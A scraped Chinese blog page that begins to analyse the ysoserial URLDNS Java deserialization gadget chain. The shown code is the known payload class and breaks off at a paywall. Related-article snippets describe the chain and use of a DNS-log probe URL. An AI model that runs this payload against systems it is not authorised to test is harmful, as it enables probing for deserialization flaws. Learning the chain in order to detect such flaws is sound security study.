java url dns_JAVA反序列化之URLDNS链分析

最新推荐文章于 2024-05-09 17:12:52 发布
最新推荐文章于 2024-05-09 17:12:52 发布
阅读量246 收藏
点赞数
文章标签: java url dns
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34093899/article/details/114113836
版权

前言

从之前shiro、fastjson等反序列化漏洞刚曝出的时候,就接触ysoserial的工具利用了,不过这么久都没好好去学习过其中的利用链,这次先从其中的一个可以说是最简单的利用链URLDNS开始学起。

分析

复制到IDEA中,并导入ysoserial的jar包,当然也可以直接构建生成整个ysoserial项目,然后找到对应的java文件进行调试。

先看下整体代码:

public class URLDNS implements ObjectPayload {

public Object getObject(final String url) throws Exception {

URLStreamHandler handler = new SilentURLStreamHandler();

HashMap ht = new HashMap();

URL u = new URL(null, url, handler);

ht.put(u, url);

Reflections.setFieldValue(u, "hashCode", -1);

return ht;

}

public static void main(final String[] args) throws Exception {

PayloadRunner.run(URLDNS.class, args);

}

static class SilentURLStreamHandler extends URLStreamHandler {

protected URLConnection openConnection(UR

最低0.47元/天 解锁文章
郑默默
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通过URLDNS来入门java反序列化
weixin_44502336的博客
10-26 1065
URLDNS链复现
java反序列化-URLDNS
GalaxySpaceX的博客
02-23 226
java反序列化-URLDNS分析
网络安全最全Java安全 URLDNS链分析(1),2024年最新2024年这些高频面试知识点最后再发一次
最新发布
2401_84254530的博客
05-09 226
最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。,从而到下一步DNS解析,然后 hashCode属性被赋值为这个URL解析的哈希值,从而为一个很长的正数,从而不为 -1,然后序列化的时候这个。当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份。
URLDNS链分析
enhengzZ的博客
01-26 2026
ysoserial ysoserial 在idea构建好项目,添加依赖真是麻了,在其pom.xml上有几个依赖位置已经改变,需要手动导入jar包。。 项目准备好后,在pom.xml找到入口类 报错了,这是因为没有传入参数,我们分析URLDNS,在编辑配置里添加程序实参 URLDNS “http://r5z2ag.ceye.io” 可见执行成功 至此能获得序列化数据 URLDNS URLDNS是ysoserial序列化中比较简单的一个链,URLDNS的利用效果是只能触发一次dns请求,而不能去执行命
Java代码审计13之URLDNS
划水的小白白
08-22 429
1、简介urldns链 2、hashmap与url类的分析 2.1、Hashmap类readObject方法的跟进 2.2、URLhashcode方法的跟进 2.3、InetAddress类的getByName方法 3、整个链路的分析 3.1、整理上述的思路 3.2、一些疑问的测试 3.3、hashmap的put方法分析 3.4、反射 3.5、整个代码 4、补充说明
java-URLDNS链分析
qq_62613905的博客
01-29 333
URLDNS链分析
Java反序列化入门之URLDNS链1
08-03
本文将深入探讨Java反序列化的基本概念、相关方法、以及如何利用ysoserial工具进行漏洞利用,特别关注URLDNS链的原理和构建。 首先,Java反序列化是指将已序列化的对象数据恢复为原来的对象状态。在Java中,序列化...
109-Java反序列化之ysoserial URLDNS模块分析.pdf
09-20
Java 反序列化之 ysoserial URLDNS 模块分析 Java 反序列化漏洞是 Java 语言中的一种常见漏洞,利用 ysoserial 工具可以对其进行攻击。ysoserial 是一个 Java 反序列化漏洞利用工具,提供了多种 payload,可以对...
URLDNS反序列化链学习.doc
07-09
URLDNS反序列化链学习】文档主要涉及的是Java中的一个安全问题,即URLDNS反序列化链。这是一种利用Java对象序列化机制进行攻击的技术,通常与代码注入和远程代码执行(RCE)漏洞相关。在这个特定的案例中,虽然不能...
S02-URLDNS反序列化构造链1
08-03
总的来说,`S02-URLDNS反序列化构造链1`是一个利用Java反序列化漏洞的实例,通过精心构造的序列化对象和`SilentURLStreamHandler`,可以在反序列化过程中触发DNS查询,这对于安全测试和漏洞探测具有重要意义。...
ShiroScan:Shiro RememberMe 1.2.4反序列化入侵图形化检测工具(Shiro-550)
03-18
有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列化后进行检测(XCheck ,即X光检查)。 功能简介 默认DNSLOG 选择后调用dnslog.cn的接口...
使用Java实现DNS域名解析的简单示例
09-03
主要介绍了使用Java实现DNS域名解析的简单示例,包括对一个动态IP主机的域名解析例子,需要的朋友可以参考下
java url dns_Java反序列化URLDNS链分析
weixin_42504279的博客
02-24 762
预备知识Java反序列化调用对应的readobject方法比如我创建一个类test。序列化test类就调用writeobject方法,反序列化调用test类的readobject方法。默认是存在的。可以重写readobject方法链子分析在HashMap中。存在readobject方法。最后调用hash(key)然后hash(key)又调用key.hashCode方法而URL类又存在一...
Java 反序列化(二) URLDNS链分析
Vicl1fe的博客
03-24 711
前言
URLDNS的gadget
公众号shadow sock7
07-04 565
调用过程: java\util\HashMap#readObject(java.io.ObjectInputStream s) java\util\HashMap#hash(Object key) 获取key(这里是URL)的hashCode java\net\URL#hashCode java\net\URLStreamHandler#hashCode(URL u) 调用栈: <init>:102, Inet4Address (java.net) lookupAllHostAddr:
java.net.URL 设置代理服务器和自定义Host头绕过DNS解析
碌人乘凉, 黎硕 --> Aerchi.com
08-29 324
在我们日常工作中,由于办公网络的限制,连接外网访问时需要指定代理, 而访问某些虚拟主机域名的服务器时,并不存在对应的dns解析记录,因此需要手工配置hosts文件来进行映射,非常麻烦。 于是根据java.net.URL的api整理了设置代理服务器和自定义Host头绕过DNS解析的方法: 代码如下: public static void main(String[] args) throw...
Java技巧: 根据网址查询DNS/IP地址
weixin_34216196的博客
12-05 539
需求: 给定一个URL地址, 例如: http://www.cncounter.com/tools/shorturl.php, 解析对应的IP地址和端口号。 说明: 本文不涉及底层的 DNS 协议, 直接使用Java平台提供的API进行操作。 DNS也就是 Domain Name Service,即 域名服务。 我们知道,...
java网络学习 java dns 域名解析协议实现
xiaoliuliu2050的专栏
08-03 4403
1 域名解析,将域名可转换为ip地址 InetAddress也可以通过使用getAddress()来获得IP地址,但是它的返回值是一个4个字节的数组。 因此尽管getAddress()在获得IP方面是有用的,但却不适于用来输出。 package dns; import java.net.InetAddress; import java.net.UnknownHostException;...
java url dns_java urldns反序列化
weixin_34475062的博客
02-13 113
java反序列化urldns漏洞触发点在hashmapgadget chainHashMap.readObject() //首先呼叫hashmap的readobject方法HashMap.putVal() //在readObject()内执行了putval函数,putval函数内计算key的hash,呼叫hash()方法HashMap.hash() //呼叫hash()方法URL.hashCo...
java dns 缓存_jvm dns缓存问题解决方式
05-24
Java中,DNS缓存是由Java虚拟机(JVM)维护的。默认情况下,JVMDNS信息进行缓存以提高性能。但是,这可能导致一些问题,例如当DNS服务器上的IP地址更改时,JVM可能仍然使用旧的地址。 解决这个问题的方法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值